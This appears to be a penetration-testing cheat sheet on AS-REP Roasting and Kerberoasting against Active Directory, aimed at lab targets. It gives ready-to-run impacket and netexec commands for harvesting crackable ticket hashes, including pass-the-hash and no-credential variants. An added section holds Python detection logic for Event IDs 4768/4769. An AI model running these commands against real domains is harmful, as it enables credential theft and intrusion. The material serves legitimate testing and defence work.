🎭Attacking Kerberos

This guide covers common attack techniques against Kerberos authentication in Active Directory environments.

AS-REP Roast Attack

If you have a list of valid users, you can perform an AS-REP Roast Attack to obtain an AS-REP (the reply that carries the Ticket Granting Ticket, TGT) and then crack its encrypted part offline to recover the user's password.

This attack asks the Domain Controller (DC) for a TGT on behalf of each user in your list without pre-authentication; the DC only answers for accounts that have the Kerberos flag DONT_REQ_PREAUTH enabled.

The attack can be repeated as you discover more valid users. In BloodHound, you can identify users that have this flag set.

Commands

# AS-REP Roast using impacket-GetNPUsers
impacket-GetNPUsers -no-pass -usersfile users.txt domain.htb/ 2>/dev/null

# AS-REP Roast through impacket-GetNPUsers with a while loop
while read -r username; do impacket-GetNPUsers domain.htb/"$username" -request -no-pass -dc-ip 10.10.10.10 >> hashes.txt; done < users.txt 2>/dev/null

# AS-REP Roast through netexec
netexec ldap 10.10.10.10 -u users.txt -p '' --asreproast hashes.txt

Kerberoasting Attack

If you have valid credentials for a domain user, you can perform a Kerberoasting Attack to request a service ticket (TGS) for any account that has a servicePrincipalName (SPN) assigned.

Part of that ticket is encrypted with the service account's key, so the obtained hash can be cracked offline to retrieve that account's credentials in plaintext.

Commands

# Kerberoasting Attack through impacket-GetUserSPNs with basic authentication
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/'user':'password' -request 2>/dev/null

# Kerberoasting Attack through Kerberos authentication (requires TGT ticket in KRB5CCNAME)
impacket-GetUserSPNs -dc-ip 10.10.10.10 -dc-host dc.domain.htb domain.htb/user -k -no-pass -request 2>/dev/null

# Kerberoasting Attack using Pass-the-Hash
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user -hashes :<NTLM_HASH> -request 2>/dev/null

# Kerberoasting Attack through netexec
netexec ldap 10.10.10.10 -u 'user' -p 'password' --kerberoasting output.txt

Exception: Kerberoasting Without Credentials

There is one case in which the Kerberoasting Attack can be performed without valid credentials.

If you know of a user that is vulnerable to AS-REP Roast (i.e., the user has the DONT_REQ_PREAUTH flag enabled), that account can be used to request the service tickets instead of a password.

In the example below, the user called usuarioASREP is susceptible to AS-REP Roast, meaning it has the Kerberos DONT_REQ_PREAUTH flag enabled, so the Kerberoasting Attack can be run without domain credentials by naming that user with -no-preauth.

impacket-GetUserSPNs -no-preauth 'usuarioASREP' -request -usersfile users.txt domain.htb/ -dc-ip 10.10.10.10 2>/dev/null
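On the defensive side, both techniques above leave a distinctive trace in the Domain Controller's Security log: AS-REP Roast produces Event ID 4768 with Pre-Authentication Type 0, and Kerberoasting produces bursts of Event ID 4769 with RC4 (0x17) ticket encryption for many different SPNs from one source. The following detection logic is an added example, not part of the original page; the sample events are constructed, the field names follow the EventData names of 4768/4769, and the threshold of three distinct SPNs per source is an assumption to tune per environment.

```python
# Added example (not from the original page): flag 4768/4769 events matching the
# AS-REP Roast and Kerberoasting patterns described above. The sample events below
# are constructed; in practice they come from Domain Controller Security logs.

RC4_HMAC = "0x17"  # ticket encryption type RC4-HMAC, which roasting tools request

# Constructed sample events modelled on the EventData fields of Event IDs 4768 / 4769.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "usuarioASREP", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.51"},
    {"EventID": 4769, "TargetUserName": "alice@DOMAIN.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "TicketOptions": "0x40810000", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "alice@DOMAIN.HTB", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "TicketOptions": "0x40810000", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "alice@DOMAIN.HTB", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "TicketOptions": "0x40810000", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "bob@DOMAIN.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "TicketOptions": "0x40810000", "IpAddress": "10.10.10.52"},
]


def find_asrep_roast(events):
    """4768 with PreAuthType 0 means a TGT was issued without pre-authentication,
    i.e. the account has DONT_REQ_PREAUTH set and its AS-REP is crackable offline."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == "0"]


def find_kerberoasting(events, threshold=3):
    """Group RC4 service-ticket requests (4769) by source IP. One client pulling RC4
    tickets for many distinct SPNs is the signature of -request / --kerberoasting.
    krbtgt and computer accounts ($) are excluded as they are not roasting targets."""
    per_source = {}
    for e in events:
        svc = e.get("ServiceName", "")
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
                and svc.lower() != "krbtgt" and not svc.endswith("$")):
            per_source.setdefault(e["IpAddress"], set()).add(svc)
    return {ip: sorted(spns) for ip, spns in per_source.items() if len(spns) >= threshold}


if __name__ == "__main__":
    print("AS-REP Roast candidates:", find_asrep_roast(SAMPLE_EVENTS))
    print("Kerberoasting sources:", find_kerberoasting(SAMPLE_EVENTS))
```

Accounts that legitimately use RC4 (older systems, or accounts with AES disabled) will raise the baseline, so the SPN-count threshold and an allow-list are what keep this usable in production.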

Key Points

  • AS-REP Roast targets users with DONT_REQ_PREAUTH flag enabled

  • Kerberoasting targets users with Service Principal Names (SPNs)

  • Both attacks can yield hashes that may be crackable offline

  • BloodHound can help identify vulnerable users

  • Multiple authentication methods are available (credentials, hashes, tickets)

Tools Used

  • impacket-GetNPUsers - For AS-REP Roast attacks

  • impacket-GetUserSPNs - For Kerberoasting attacks

  • netexec - Alternative tool for both attack types

  • BloodHound - For reconnaissance and identifying vulnerable accounts
